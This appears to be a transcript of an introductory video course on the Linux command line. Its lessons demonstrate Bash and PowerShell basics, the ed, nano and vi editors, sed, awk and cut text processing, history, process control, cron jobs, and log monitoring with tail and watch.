So instead of clicking on buttons and selecting for menus in a graphical user interface, we type commands. So
for a while a command-line interface was the primary way to operate modern computers. And it still is for
many computers that operate as servers. The command-line is always there under the hood in almost every PC
or desktop based computer. It's even there in most mobile devices, even though direct access is forbidden or
limited, or sometimes hidden from direct use. So in this particular image capture of a command-line interface,
I've run a command called ls with an option hyphen l. So the ls command is the list directory contents
command, and the -l option is long list format. So it shows the contents of the current folder in a list format
with various properties, including the file permissions, the user and group, the size, the date and time. And then
the object itself. In this case, they're highlighted in blue, desktop, documents, downloads, etc, because these are
all directories or sub folders. Now what are some of the common features?
Well, command-line environments, as I mentioned, are keyboard based. So we don't deal with images or
graphics and we don't interact with the mouse or a mouse cursor so that we're not clicking on things.
[Video description begins] Command line interface is text-driven. [Video description ends]
It's built around something called command processing. So we type the command, hit Enter, and the
command-line environment or shell processes commands that we type. We can automate with scripts. So
instead of typing the commands individually, we can type the commands into a file, and then run that file and
the commands get process. And this is an alternative to a graphical user interface. Even if we're using a
graphical user interface, a GUI, as our primary mode of computing, we can often open up what we call a
terminal window inside of a graphical user interface. That gives us a command-line interface to perform our
scripts and command processing. Which gives us access to the underlying operating system, the hard disks,
network communications, etc.
So the Command-line Interface Structure consists of a prompt. So this has usually the username and host
name, as well as the directory location that we're currently operating from. And it gives us a little cursor to
show readiness, so that we can actually type the commands. When we run a command, the prompt usually goes
away until the command finishes, and then we return to the prompt once our command-line is ready to process
new commands. Not only do we type commands, we also type arguments, which are parameters or options that
we supply to our commands. And most of our command-line environments have a built-in-help. Either directly
through the command itself by supplying a question mark, -h, or --help, as an argument or option to the
command. So we can discover what options we need to pass to a command to get it to do what we want.
Now, our command-line interfaces are built around Shells or Shells Scripts. A shell is just a command
language. So it gives us particular syntaxes, so that we can interact with our command-line environment.
They're often simple syntaxes at least when compared to general purpose programming languages. And we can
issue batches of commands. So we can string them together or compose them. So we can increase the
complexity and do more with a bunch of simple commands working together. And it gives us system access
like to the file system, various devices including network communications.
[Video description begins] Drawbacks [Video description ends]
Now what are some of the drawbacks of command-line interfaces? Well they're often prone to errors so syntax
and typing errors. So if we mistype something it won't do what we want. It often has a steep learning curve and
it's harder to discover things. We can't just explore through menus or buttons like we can when we visually
interact with a GUI application. There's some language limitations. So limitations of what we can do with the
scripting language of the command interface. And it's not always portable. So scripts that we run on one
system do not necessarily run on another. So if we write a script for a Windows operating system, it might not
work with UNIX or Linux, or BSD, or Mac. So we have all these systems, although there's some similarities.
They're often not the same because the underlying operating systems and how we interact are different. And
that concludes this presentation on command-line properties.
After completing this video, you will be able to describe the command processing capabilities and environment
of the Bash shell.
Objectives
describe the command processing capabilities and environment of the Bash shell
[Video description begins] Topic title: Bash Properties. The presenter is Steve Scott. [Video description ends]
In this video, I'll describe the command processing capabilities and environment of the Bash Shell. So what is
the Bash shell? Well, it's a command language for CLI, a command-line interface. It was written for the GNU
project in 1989 by Brian Fox, and it's the default interactive shell for many, if not most Linux distributions. It
has programming features, variables, conditionals, and loops. So it could be written as a script for automating
tasks. And it's also platform independent. So it's not only Linux that the Bash shell works on, other Unix
distributions as well as BSDs and even Microsoft Windows.
So what are some of the basic features of Bash scripting? Because it's a command language for a command-
line interface, for a CLI, Bash has printing and echoing output capabilities. For instance, using the echo
command or using the cat command to output the contents of a file. It can read user input, can use conditional
logic and loops, so if statements, if else statements, for loops and while loops, typical programming constructs.
So we can pass arguments or options to Bash scripts and we can manipulate string data. So we can get subsets
of strings, we can replace data in strings, and we can compare strings using Bash. So what are some other
important features that sets Bash apart?
Well it's configurable, so we can customize it and customize its behavior so that we can be more productive
with it based on our own needs. So this is important to know because the way you set up Bash in your own
environment, say on your own workstation or your own servers, might be different from how other people set
it up. So if you go from one Bash shell environment to another, be aware that some things could be configured
differently. It has command name and path completion. So if you start typing a command and you type half the
command in and press the Tab key, Bash will often complete the rest of the command name if it's the only
command by that name.
If there are similar command names, it'll show you a list of options or a list of other commands that have the
same name. And the same goes for path completion. If you start writing the directory path to a file including
the file itself, if you hit the Tab key, Bash can often complete the path, especially if it's a unique path.
Otherwise, again, it will show you various options if you hit the Tab key a few times. We have an interactive
command history. So we can run the history command, see what previous commands have been run. And we
have the ability to rerun commands using the history features of Bash.
We have regular expression and pattern matching built into Bash, so we can find particular strings within text
or do find and replaces based on regular expressions or simple pattern matching. And we have inter-process
communication through pipes. So we can pipe one command into another into another successively, taking the
output of one program, one script, and inputting it to another. Which allows us to automate tasks by composing
commands and scripts together. And Bash is portable, so there's a portability between UNIX/Linux, MacOS,
and Windows.
Now up until recently, Bash was the default in MacOS which is since been changed to be the Z-shell or ZSH.
But Bash is still there and you can set it to be your preferred shell instead of the default. As well as Microsoft
Windows, now supports running Bash as a shell environment. Most Linux's as I mentioned previously has
Bash as the default shell. And most UNIXs in general, although they might use Z shell or KornShell, KSH, or
C shell or other shell environments, Bash shell is usually one of the options. And that concludes this
presentation on Bash properties.
After completing this video, you will be able to describe the features and capabilities of the PowerShell
environment.
Objectives
[Video description begins] Topic title: PowerShell Environment. The presenter is Steve Scott. [Video
description ends]
In this video, I'll describe the features and capabilities of the PowerShell environment.
So what are some of the important features? Well, it's a command-line shell. Commands are run interactively
from a command-line interface. In a text based input and output, we get a scripting language. PowerShell
scripts and functions have typical language features such as variables, conditionals, and loops. And we get
system access with a direct connection to the .Net framework and its classes. So commands can use any .Net
API directly.
Now, PowerShell Design is centered around four main elements. Pipelines, so this is interprocess stream of
outputs and inputs. So the output of one program can be the input to another through the pipeline operation.
Just as with UNIX. And it also uses the pipe operator. We get an application programming interface with the
direct connection to .Net. PowerShell scripts can be created, typically using files with the .PS1 file extension.
And we have what we call cmdlets. So these are the commands in the verb-noun pattern That power the
PowerShell environment.
So let's take some PowerShell command comparisons or equivalence that we have in UNIX or Linux, often
through bash and other shell programs. So some of the verb nouns are Get-Content, Get-ChildItem, Set-
Location, Copy-Item, Remove-Item, Move-Item and Invoke-WebRequest. So these are some common
PowerShell commands. Now there are equivalents so the Get-Content is equivalent to the cat command. So the
cat command will output the contents of a file. The ls command lists the contents of the current folder which
we can do with Get-ChildItem in PowerShell. CD is to change directory, and that's accomplish through Set-
Location copy or cp is done through Copy-Item, del, rm, or rmdir will remove a file or directory and in
PowerShell, we just need remove item move in mv we use move item and invoke web request as equivalence
using the command-line programs curl or wget. And that concludes this presentation on the PowerShell
environment.
[Video description begins] Topic title: Text Editing Basics. The presenter is Steve Scott. [Video description
ends]
In this video, I'll demonstrate how to perform command-line text editing with nano, Vi, and ed.
[Video description begins] The Terminal window opens. The following prompt is displayed:
steve@vm1:~/Documents$. [Video description ends]
So we'll start with Ed. So it's just the letters e and d, which looks like ed but it's pronounced E-D, which is the
default UNIX editor. And this was released a long time ago in 1973, and although it's not often used nowadays
as an editor, it's best to think of it as a line editor written before computers head monitors. But it still comes up
in shell scripts for its ability to automate text editing actions and regular expressions. So it's not known for its
ease of use, quite the opposite. But knowing how it operates and a few basic commands is a good skill to have
if you're a system administrator, or if you're working with legacy Linux systems, or if you just want to impress
your UNIX friends. Ed also influence the development of many other tools including Vi, which I'll talk about
later in this video. So let's start with Ed and I'm going to type in a file name, a_tale_of_two_cities.
[Video description begins] He executes the following command: ed a_tale_of_two_cities. The window prompts
that there is no such file or directory. [Video description ends]
So it tells me that there's no such file or directory. But in this case, we're going to create this file. Now when
we start ed, we start in what's called command mode. So we can't just start typing text to add to the file, we
need to issue a command first. So I issue the, a command for append. Now we can start typing. So now we're
in input mode. So it was the best of times, Enter. It was the worst of times, Enter. And now to get out of this
input mode, we just put a period on its own line and it will exit input mode. And now we can issue other
commands. So I can issue w for write and q for quit.
[Video description begins] He executes the following command: w. The output reads: 53. He executes the
following command: q. No output displays and the prompt remains the same. [Video description ends]
And now if I look in the current directory, there's a file called a_tale_of_two_cities.
[Video description begins] He executes the following command: ls. The output reads:
a_tale_of_two_cities. [Video description ends]
If I use the cat command, a_tale_of_two_cities, it shows me the contents of the file.
[Video description begins] He executes the following command: cat a_tale_of_two_cities. The output displays
the content of the given filename. [Video description ends]
If I run ed on a tale of two cities again, it tells me how many bytes were loaded when it loads up, so it shows
53.
[Video description begins] He executes the following command: ed a_tale_of_two_cities. The output reads:
53. [Video description ends]
And if I type a, I can append some more texts to this. And I can type it was the age of wisdom, Enter. A period
to get out of the append mode, and now I type q to quit, but it gives me a question mark. Well, if it shows this,
it means that some type of error or a warning occurred. So if I hit h or the h command, it tells me warning
buffer modified, which means we made a change to the file, but we didn't actually save the changes. So I need
to issue a w command first and I can actually combine that with the quit. So w and q together, which will write
the file and quit.
[Video description begins] He executes the following command: wq. The output reads 79. [Video description
ends]
So remember anytime you see a question mark, there's a warning or an error, and you can use h to see what
that was. And then it tells me when I write and quit that the file now contains 79 bytes. Now let's move on to
another editor called nano. So I can type nano a_tale_of_two_cities.
[Video description begins] He executes the following command: nano a_tale_of_two_cities. The GNU nano
2.9.3 editor opens. The a_tale_of_two_cities file is open. [Video description ends]
And it will open up this file in this editor, this the new nano editor. So this is an open source editor available on
most or if not all Linux operating systems and most UNIXs. So it's an interactive command-line text editor and
not a line editor like ed. Nano uses Ctrl and meta keys to control operation. And in my opinion, it's one of the
easiest to get up and running with on the command-line without worrying about the modes of operation. And
we can use the arrow keys to move up and down and through the file or the PgUp and PgDn or the End and
Home keys to navigate. We can also use the keyboard using Ctrl + F to go forward on the line and Ctrl + B to
go backwards. So you can keep your hands on the keys and not move them over to the arrow keys for a more
efficient operation. In Ctrl + N goes to the next line, and Ctrl + P goes up a line, so to the previous line. Ctrl +
O is the write out command, so the save command and it's asked me to save the file and Ctrl + X exits nano
and gets out of it.
[Video description begins] He switches to the Terminal window. [Video description ends]
So if you know some of the basic commands especially Ctrl + X to exit and Ctrl + O to save, and you can get
up and running with nano quite easily. Now another editor that comes up and is still used quite often is Vi. And
on Linux in the command-line, if I type Vi, it opens VIM, which is Vi improved, which is a modern version of
Vi.
[Video description begins] He executes the following command: vi. The VIM editor opens. [Video description
ends]
And the nice thing about this, it gives me some basic commands that I can use. Now the first time I used Vi
having never experienced anything like it, I had no idea what I was in for. So after launching Vi, I had no idea
how to exit the program. I didn't even know how to insert or append text. And I had no idea about command
mode or insert mode. So with Vi if I type :q, it quits Vi.
[Video description begins] He executes the following command: :q. He switches to the Terminal
window. [Video description ends]
Now we can navigate within the file using K and J to move down and up and H and L to move back and
forward on the line. So you can navigate with your fingers on the home row and then if I want to add, I can go
to the end of the file and type the A key which will append. And I can start typing. It was the age of
foolishness, but I'm in input mode. How do I get back into the command mode? Well, it's not like ed where I
put a period on its own line. Actually just hit the Esc key, and that brings me back into command mode. And if
I type colon, I can type q to quit. But it gives me an error at the bottom saying, No write since last change, add
exclamation mark to override. So this is like trying to quit while the file was modified. If I wanted to write it, I
type colon, and then w to write, and then q to quit. And so I can combine them with wq and it writes and saves
the file.
[Video description begins] He executes the following command: wq. He switches to the Terminal
window. [Video description ends]
So Vi was heavily influenced by ed, but it's also a lot like Nano in how it interactively edits. So it's a
combination of an interactive editor and a line editor with command and input mode. But as far as command-
line text editing goes, having the basics of Nano, Ed, and Vi in your toolbox is enough to get you started
regardless of the editor you choose for yourself. And that concludes this demonstration of command-line text
editing basics.
In this video, you will perform basic text processing with sed, awk, and cut, and describe the differences
between them.
Objectives
perform basic text processing with sed, awk, and cut, and describe their differences
[Video description begins] Topic title: Text Processing. The presenter is Steve Scott. [Video description ends]
In this video, I'll demonstrate how to perform basic text processing, so that you can recognize how commands
and scripts are written using sed, awk and cut.
[Video description begins] The Terminal window opens. The following prompt is displayed:
steve@vm1:~$. [Video description ends]
So we'll start with the sed command, which stands for stream editor. This is for processing string data or text
file. This is done primarily through pattern matching, Find and Replace, and using regular expression. So we
carry out replacing, deleting, and filtering on text data. So I'll start by going into my Documents folder.
[Video description begins] He executes the following command: cd Documents/. The following prompt is
displayed: steve@vm1:~/Documents$. [Video description ends]
And in this folder I have a file called a tale of two cities, which has the first few lines of the novel A Tale of
Two Cities by Charles Dickens, so I use cat to output the contents, so that we can see what we're working with.
[Video description begins] He executes the following command: cat a_tale_of_two_cities. The output displays
the content of the given filename. [Video description ends]
So it gives us the text of the first four lines, it was the best of times, it was the worst of times. It was the age of
wisdom, it was the age of foolishness and then it stops there. So let's start with our first sed example. So you
sed and in then single quote I put s for substitute slash and I'm going to replace foolish. So I type foolish/ and
then I'm going to type what I want to replace it with and I'll type crazi/ ' and then I close the quote. So this will
replace the occurrence of foolish with crazy. So instead of foolishness, it will say craziness. And then I give it
the file name.
[Video description begins] He executes the following command: sed 's/foolish/crazi/' a_tale_of_two_cities. The
output displays the content of the a_tale_of_two_cities file where foolishness is replaced with
craziness. [Video description ends]
So we get the output with it was the age of craziness as the last line. But if we look at the contents of the file
again, you'll notice nothing has changed.
[Video description begins] He executes the following command: cat a_tale_of_two_cities. The output displays
the original content of the a_tale_of_two_cities file. [Video description ends]
So it's not editing the file destructively. It's just changing the text and redirecting it to the standard output. So
let's try another thing. So let's replace the first character. Instead of having lowercase i's for it on the last three
lines, let's change it to uppercase. So we'll get something a little bit more verbose. So I start with sed 's/^./. So
this will replace the first character, and then I do \U and I want to keep that match so I put an & /. So this looks
a bit more verbose, but it's saying the first character, so the character period, replace it with its uppercase
equivalent. And then I put in a_tale_of_two_cities.
[Video description begins] He executes the following command: sed 's/^./\U&/' a_tale_of_two_cities. The
output displays the content of the a_tale_of_two_cities file where in the last three lines the lowercase "i" in the
word "it" has been replaced by uppercase "I". [Video description ends]
All the i's in it, have now been converted to uppercase, although it hasn't changed the file. Now I'm going to
arrow up, and I'll go back through the text instead of having just the uppercase change I want to make them
sentences and so I'll remove in the commas and I'll put in periods. So I can use -e. I give it the expression, the
same expression I had previously to replace the first character with uppercase, and then -e. And now I'm going
to do a substitution. So in single quotes, I have 's/, / . /'. So this will replace every occurrence of a comma with
a period.
[Video description begins] He executes the following command: sed -e 's/^./\U&/' -e 's/,/./'
a_tale_of_two_cities. The output displays the content of the a_tale_of_two_cities file where the commas at end
of each line are replaced with periods. [Video description ends]
And now we have four sentences instead of having it in the poetic fashion with commas and lowercase i's.
Now if we want more information on how to use sed we can always use the man command for manual of sed
and it gives the details the description and the options for sed. So I'll quit and now we'll move on to awk.
[Video description begins] He executes the following command: man sed. The manual page of sed command
opens. [Video description ends]
Now awk can be seen as complimentary to sed, but we think of it as a text processing language for extracting
and filtering data.
[Video description begins] He switches to the Terminal window. [Video description ends]
So what I'm going to extract if I do an ls, -l, it'll give me the contents of the current folder in long list format.
[Video description begins] He executes the following command: ls -l. The output lists the files and directories
in long listing format. [Video description ends]
Now if I want to extract only a portion of it, let's say the file permissions at the beginning and the file names at
the end, I can put a pipe after ls -l -awk, so we're piping the string into awk. And then single quotes, I put a
brace, followed by print $1, $9 I close the brace and close the quote.
[Video description begins] He executes the following command: ls -l | awk '{ print $1, $9 }'. The output
displays the permissions and the names of the files and directories. [Video description ends]
And now I just get the first field and the ninth field. So I get the file permissions and I get the files themselves.
So awk uses the spaces between to determine where to delimit the fields and then it extracts the first and ninth.
Now we can use different delimiters for awk. And not just the spaces or tabs or any whitespace we can use
particular characters like commas, semicolons and colons. And I'm going to do that right now on the password
file. So I'll do cat /etc/passwd, and you'll notice all this information about users and their shells and their logins
and their groups etc are delimited by colons.
[Video description begins] He executes the following command: cat /etc/passwd. The output displays the
system's account, giving for each account some useful information such as user ID, group ID, home directory,
and shell. [Video description ends]
So if I run awk -F for the field separator, then I give it a ':' another space followed by the awk command. So in
single quotes again, I do a print, $1. And then I close the brace and close the quote. And I do that on the file
/etc/passwd. And of course it doesn't modify it.
[Video description begins] He executes the following command: awk -F':' '{print $1}' /etc/passwd. The output
lists the usernames of the /etc/passwd file. [Video description ends]
It just processes the text and prints the output. So here I get the first field which has all the usernames included
in the passwd file. And now the last command is cut. Which just cuts lines of text into parts or pieces. So if I
do something similar to what I did before with ls -l, to get the contents of the directory in this format, I can
pipe this into so I give it a pipe, and I pipe it into cut.
[Video description begins] He executes the following command: ls -l. The output lists the files and directories
in long listing format. [Video description ends]
And now let's say I want to extract a certain number of characters. So I do -c, a C option, and I'm going to give
it -7.
[Video description begins] He executes the following command: ls -l | cut -c -7. The output displays the first
seven characters from each line of the list of files and directories in long listing format. [Video description
ends]
So what this does is give us the first seven characters from each line.
[Video description begins] He executes the following command: ls -l | cut -c 7. The output displays the seventh
character of each line of the list of files and directories in long listing format. [Video description ends]
Now if I do cut seven, it actually gives us the seventh character from each line. So it counts out to the seventh
character and just puts the seventh. So it's not everything up to the seventh. But just putting the seven like this
just gives us the seventh character and not everything up to that point. But we can also operate on fields. So I'll
replace this command with cut -f 3.
[Video description begins] He executes the following command: ls -l | cut -f 3. The output lists the files and
directories in long listing format. [Video description ends]
The default delimiter for cut is the tab character when you give it the F option. So we need to specify a -d
option with a space as its argument.
[Video description begins] He executes the following command: ls -l | cut -f 3 -d' '. The output displays the
third field, which is username from the list of files and directories in long listing format. [Video description
ends]
So in this case, it delimits on the space, and it gives me third field, which is the username field, and I get steve.
Now there's one more action I'd like to carry out, and this is the same action we did, extracting the first field.
So if I do a cut -d with the delimiter being the colon, -f 1 /etc/passwd, so the password file, it gives the same
result as the last awk command we did with the same action.
[Video description begins] He executes the following command: cut -d':' -f 1 /etc/passwd. The output displays
all the usernames of the /etc/passwd file. [Video description ends]
So there can be some overlap in these tools, but they're also used together in a complimentary way. And that
concludes this demonstration of text processing.
repeat actions and view the command line using the bash history
[Video description begins] Topic title: Bash History. The presenter is Steve Scott. [Video description ends]
In this video, I'll demonstrate how to repeat actions using the command line utility history.
[Video description begins] The Terminal window opens. The following prompt is displayed:
steve@vm1:~/Documents$. [Video description ends]
So this is using the bash history command. So if I type history into my command line environment, I get a list
of all the recent commands.
[Video description begins] He executes the following command: history. The output lists all the executed
command. [Video description ends]
We have 743 commands returned. So that's a lot to look through. If we'd like to look for a particular command,
we can pipe history. So history | grep, which we can use to search for particular expressions or names. So if I'd
like to get all of the occurrences of sed, I type grep "sed" and it will return all of the occurrences of sed.
[Video description begins] He executes the following command: history | grep "sed". The output displays a list
of all the executed commands which includes sed. [Video description ends]
If I type history | grep "curl", I'll see all the times that curl was run.
[Video description begins] He executes the following command: history | grep "curl". The output displays a
list of all the executed commands which includes curl. [Video description ends]
If I just like to see the last five commands, I can type history | tail -n 5. This will show me the last five.
[Video description begins] He executes the following command: history | tail -n 5. The output displays the last
five executed commands. [Video description ends]
If I'd like to execute the last command, I can type a double exclamation mark that will execute the last
command, the most recent command from the history. I can also execute commands by number.
[Video description begins] He executes the following command: !!. It executes the last command. The output
of the last command is displayed. [Video description ends]
So I'll do history | grep, and I'll pass awk into grep. And I'll retype that because I spelled history wrong.
[Video description begins] He executes the following command: history | grep "awk". The output displays a
list of all the executed commands which includes awk. [Video description ends]
So I can see all the commands that were used to run awk.
[Video description begins] In the output, he points to the line number 734. It contains awk -F':' '{print $1}'
/etc/passwd. [Video description ends]
So in this case, I'm going to run number 734 from history if I type !734, it runs the command.
[Video description begins] He executes the following command: !734. It executes the command on the line
number 734. The output displays a list of usernames of the /etc/passwd file. [Video description ends]
Now if I just like to see the command, I can type !734:p and it just shows what the command was.
[Video description begins] He executes the following command: !734:p. The output reads: awk -F':' '{print
$1}' /etc/passwd. [Video description ends]
And I can do the same thing with the !!:p, it will show the last command that was run which in this case, it's
the same.
[Video description begins] He executes the following command: !!:p. The output reads: awk -F':' '{print
$1}' /etc/passwd. [Video description ends]
Now at some point, we may want to clear the history. So in that case, we can type history -c, and that will clear
the history.
[Video description begins] He executes the following command: history -c. No output displays and the prompt
remains the same. [Video description ends]
[Video description begins] He executes the following command: history. The output lists all the executed
command. [Video description ends]
The only command in the history is actually running the history command itself. I can also use man of history
to bring up the history menu.
[Video description begins] He executes the following command: man history. The manual page of history
command opens. [Video description ends]
So it gives all the options if I scroll down, and different options we can use when running the history
command.
[Video description begins] He switches to the Terminal window. [Video description ends]
[Video description begins] Topic title: Process Management. The presenter is Steve Scott. [Video description
ends]
In this video, I'll demonstrate how to perform process control tasks including ps and kill, as well as some
related command.
[Video description begins] The Terminal window opens. The following prompt is displayed:
steve@vm1:~/Documents$. [Video description ends]
So our computers run many processes concurrently, many run in the background, in memory, where we can't
see them, and other programs do run in the foreground, ones that we can interact with. Quite often we need to
know what is running, including background processes, especially if our computers are slowing down. so that
we can find what processes are running. And if some occupied too many resources, then we need to close
them. So to discover what's happening, we turn to the ps command, which stands for Process Status. So if I run
ps, it will return the processes for the current shell.
[Video description begins] He executes the following command: ps. The output displays processes of the
current shell. [Video description ends]
I'm running bash and ps, the command I executed. If I want to see processes for every process, I do ps -e so I
give it the e option. And it shows me everything.
[Video description begins] He executes the following command: ps -e. The output displays all the processes
and the related information. [Video description ends]
Now it's in a minimal format here, I can get more information if I do ps -ef.
[Video description begins] He executes the following command: ps -ef. The output displays all the processes
and the related information in full format. [Video description ends]
So this gives me the full format. And there's a lot of information going on here, including who the process
belongs to. In this case, we see steve and root down the left hand side. Its process ID, what time it was run out,
and the program name. Now since there's too much to see on a single screen, there's a handy way to step
through it page by page. So if you do ps -ef, and we pipe that into command less, it shows the entire contents.
[Video description begins] He executes the following command: ps -ef | less. The output displays all the
processes and the related information in full format page by page. [Video description ends]
So the first page, if we hit the space bar it steps through it page by page until we reach the end of the processes.
So that's how we can see all of them, but there's a lot to go through, and a lot of these processes we don't care
too much about. So we can also do ps -ef | grep. So let's say we want to grep for bash.
[Video description begins] He executes the following command: ps -ef | grep "bash". The output displays the
process information of the bash shell. [Video description ends]
It actually returns the process information for the bash shell. If we want to see processes displayed in real time
where we can see the actual resource use, we can use the top command.
[Video description begins] He executes the following command: top. The output displays the dynamic real-
time view of the running system. [Video description ends]
And it actually gives us a full screen view into our current system, and all of the processes that are running,
including putting ones that are using CPU at the top of the list. It shows the memory for the system, the CPUs
for the system, the number of tasks, the number of running, sleeping, etc. So there's a lot of information here
that we can use to see in real time. But often what happens, if there's a process that's using a lot of CPU and
memory, it gets pinned to the top of this list. So you can see processes that are using too many resources. So
I'll type q to get out of the top command. And I'm going to open another terminal window.
[Video description begins] Another Terminal window opens. The following prompt is displayed:
steve@vm1:~$. [Video description ends]
So I open this additional terminal window, and I'll move it to the side. And I'm going to use the ping command
because it will keep pinging a particular address that I specify. So ping sends a little request. So ping sends a
little requests to another computer over the network. And that computer will respond saying I got your ping
request. So it's kind of like ping pong.
[Video description begins] He executes the following command: ping 192.168.2.1. The ping command displays
how long it took to transmit that data and get a response. [Video description ends]
So it's pinging and it's receiving responses and how long it takes to respond. So let this go and I'll switch back
to our main terminal window. And now I'm going to do ps -ef | grep "ping".
[Video description begins] He executes the following command: ps -ef | grep "ping". The output displays the
process information of ping. [Video description ends]
And it shows that ping is running and how it's being run. So ping of 192.168 .2.1. Now, there are process IDs
here. But what I'm going to do is use the pgrep function, and I'm going to give it ping.
[Video description begins] He executes the following command: pgrep "ping". The output displays process ID
of ping. [Video description ends]
So it actually shows just the process ID. So if I look at pgrep, which is process grep, it returns the process ID
for the utility grep, which matches up in our list from our ps command. So I can do kill 3634 and it will kill the
process.
[Video description begins] He executes the following command: kill 3634. No output displays and the prompt
remains the same. [Video description ends]
And you'll see that this process was terminated in the other terminal window.
[Video description begins] He switches to the second Terminal window. The window prompts:
Terminated. [Video description ends]
So that's one way of stopping a process. Now, I'll run ping again.
[Video description begins] He executes the following command: ping 192.168.2.1. The ping command displays
how long it took to transmit that data and get a response. He switches to the first Terminal window. [Video
description ends]
But this time, it's going to be running under a different process IDs. Each time a program is started, it gets a
new process ID. So I'll do pgrep "ping" and this time it's 3638.
[Video description begins] He executes the following command: pgrep "ping". The output displays process ID
of ping. [Video description ends]
Now let's suppose the process has stopped running. It's gotten into a state that it's unresponsive, so we can't do
anything to close it. And it won't close if we execute a normal kill command. There's actually a hard kill, a
terminate option, which is -9, which says stop this process in the worst possible way. We just want it to stop.
So don't give it time to shut down gracefully just kill it.
[Video description begins] He executes the following command: kill -9 3638. No output displays and the
prompt remains the same. He switches to the second Terminal window. The window prompts: Killed. [Video
description ends]
And if I go over, instead of showing terminated, it shows Killed. So we abruptly ended it. Now I'll run it one
last time. Now there's another way we can stop a process using pkill.
[Video description begins] He executes the following command: ping 192.168.2.1. The ping command displays
how long it took to transmit that data and get a response. He switches to the first Terminal window. [Video
description ends]
So the pkill also takes the same parameters. We can do pkill of -9 or just pkill and give it the actual process
name, in this case ping.
[Video description begins] He executes the following command: pkill ping. No output displays and the prompt
remains the same. [Video description ends]
[Video description begins] He switches to the second Terminal window. The window prompts:
Terminated. [Video description ends]
So if we look in our other terminal window, the ping process has been terminated again. And that concludes
this demonstration of Process Management.
During this video, you will learn how to schedule the execution of tasks using a crontab.
Objectives
[Video description begins] Topic title: Scheduled Jobs. The presenter is Steve Scott. [Video description ends]
In this video, I'll demonstrate how to schedule execution of tasks using a crontab.
[Video description begins] The Terminal window opens. The following prompt is displayed:
steve@vm1:~/Documents$. [Video description ends]
So the problem here is simple enough. On many systems, including personal computers and servers, we need
to run tasks periodically, often on an hourly, daily, or weekly schedule at a particular time of day or night. The
cron or crontab does just that. So to see what the current user has running as scheduled jobs, we run crontab -l.
[Video description begins] He executes the following command: crontab -l. The output reads: no crontab for
Steve. [Video description ends]
And now it says there's no crontab for steve. So we need to create one. So we can do crontab -e to edit the
crontab.
[Video description begins] He executes the following command: crontab -e. The GNU nano 2.9.3 editor opens.
A text file is open. [Video description ends]
So it's going to edit this text file, this configuration for a crontab, using nano. So I'll go down to the bottom of
this file, and now the format for a crontab is quite particular. So what it does is what's you specify the minute,
the hour, the day of the month, the month, and the day of the week you want particular command, or job, or
script to run. In this case, I'm just going to run the touch command which will create a file if it doesn't exist.
And if it does exist it'll update its date/time stamp. So we'll do /home/steve/Documents/hello_from_crontab. So
this file does not currently exist, but when I run the crontab, and every minute it will run this command.
[Video description begins] He enters the following command: 30 2 * * 0 ls. [Video description ends]
So now, write out and save this file. And I'll exit.
[Video description begins] He switches to the Terminal window. The window prompts: no crontab for steve -
using an empty one crontab: installing new crontab. [Video description ends]
[Video description begins] He executes the following command: ls. The output lists files and
directories. [Video description ends]
So if I look in the current folder, there's three files currently. a_tale_of_two_cities, tale1, and tale2.
[Video description begins] He executes the following command: date. The output displays the system's date
and time. [Video description ends]
Now if we wait, once we pass the next minute, and we run ls again, we'll eventually see hello_from_crontab.
[Video description begins] He executes the following command: ls. The output lists files and directories.
[Video description ends]
[Video description begins] He executes the following command: date. The output displays the system's date
and time. He executes the following command: ls. The output lists files and directories. [Video description
ends]
Now we're not going to wait till Sunday at 2:30 in the morning to see if the other command runs, but you get
the idea. Now let's open up the crontab again, so crontab -e.
[Video description begins] He executes the following command: crontab -e. The GNU nano 2.9.3 editor opens.
A previous text file is open. [Video description ends]
And if we look at the options, now there's one thing I will mention. Let's say we put 5 for the minute and then
* for everything else, so ****.
[Video description begins] He enters the following command: 5 * * * *. [Video description ends]
Now if we set a crontab with this setting, it's going to run at 5 minutes past the hour, every hour. So when the
minute hand to the clock hits 5, it will run the script. If we want it to run every five minutes, we could do 5, 10,
15, 20, 25, all the way up to 55 and 0, or on the 0 hand of the minute. Or there's a shortcut. The shortcut is we
can do * and then /5. And this is the shorthand for running every five minutes. So let's close the file without
saving.
[Video description begins] He switches to the Terminal window. [Video description ends]
To find out how to use the tail and watch commands for file and command monitoring, consult a search engine
or relevant online documentation.
Objectives
use the tail and watch commands for file and command monitoring
[Video description begins] Topic title: File Monitoring. The presenter is Steve Scott. [Video description ends]
In this video, I'll demonstrate how to use the tail and watch commands for file and command monitoring.
[Video description begins] The Terminal window opens. The following prompt is displayed:
steve@vm1:~/Documents$. [Video description ends]
So tail is ideal for files that get appended to periodically. So the best example of this is log files. When an
event occurs, new lines get added to the file. So let's look at one file. In particular, I'll do a tail in the
/var/log/auth.log file. So any authorization or any escalation of privileges that are run as the root user will get
logged to the auth log.
[Video description begins] He executes the following command: tail /var/log/auth.log. The output displays last
ten lines of the /var/log/auth.log file. [Video description ends]
[Video description begins] He opens another Terminal window. The following prompt is displayed:
steve@vm1:~$. [Video description ends]
[Video description begins] He executes the following command: sudo ls /. The window prompts to enter
password for Steve.[Video description ends]
And now if I do a tale on auth.log, I see the results saying that, sudo is run by steve from the path, /home/steve,
the USER root, and the COMMAND is bin/ ls /.
[Video description begins] The output displays the list of files and directories. He switches to the first
Terminal window. He executes the following command: tail /var/log/auth.log. The output displays last ten
lines of the /var/log/auth.log file. [Video description ends]
So that's the full authentication for that command. We can also monitor and log file by running tail -f which is
short for follow. So we want to follow the log so /var/log/auth.log. Now switch over to the other terminal
window that I had opened and run sudo ls / one more time.
[Video description begins] He executes the following command: tail -f /var/log/auth.log. The output displays
last ten lines of the /var/log/auth.log file and updates it as the file changes. [Video description ends]
And as soon as I run it, the other file that I'm following that I'm tailing with - f actually updates immediately.
[Video description begins] He executes the following command: sudo ls /. The output displays the list of files
and directories. He switches to the first Terminal window. [Video description ends]
So it constantly monitors this file for changes. So I'll use ctrl C to get out. And now we'll test the watch
command.
[Video description begins] The following prompt is displayed: steve@vm1:~/Documents$. [Video description
ends]
So this runs a program periodically, so that you can monitor for changes. So one easy example is to call watch
of date.
[Video description begins] He executes the following command: watch date. An output window opens and
displays the system's date and time at regular intervals. [Video description ends]
So every two seconds, it runs the date command and updates it. So Friday, or Fri Mar 6 17:18:22, 24, 26, 28.
So it keeps updating every two seconds and then I can Control C out of it.
[Video description begins] He switches to the first Terminal window. [Video description ends]
Suppose I want it at a different resolution, a different wait. So I can do watch -n the number of seconds to wait.
The default is 2. We can set it to 1 or to 5 or just something else, so that the program runs faster or slower.
[Video description begins] He executes the following command: watch -n 1 date. The output window opens
and displays the system's date and time at an interval of 1 second. [Video description ends]
